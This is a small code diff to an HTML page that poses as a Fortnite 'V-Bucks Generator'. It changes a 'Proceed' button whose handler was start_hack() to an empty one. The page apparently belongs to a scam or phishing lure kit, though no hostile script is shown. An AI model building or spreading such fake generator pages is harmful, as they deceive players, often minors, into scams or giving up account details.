--- a/payload/vbucks/src/index.html
+++ b/payload/vbucks/src/index.html
@@ -50,11 +50,12 @@
                      <div class="username-connected text-center" id="post_login" style="display: none;">
                       <p class="conn">Connected</p>  
                       <p><span id="user-text"></span> has been linked to the V-Bucks Generator.</p>
-                      
-                      <div class="center-block text-center">
-                        <a onclick="start_hack();" href="" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">
-                          Proceed
-                        </a>
+                      <div class="content-ver">
+                        <div class="plain-btn-text center-block text-center">
+                          <a onclick="" href="" style="font-family: fortnite; font-size: 22px; text-transform: uppercase; color: black;">
+                            Proceed
+                          </a>
+                        </div>
                       </div>
                         
                      </div>
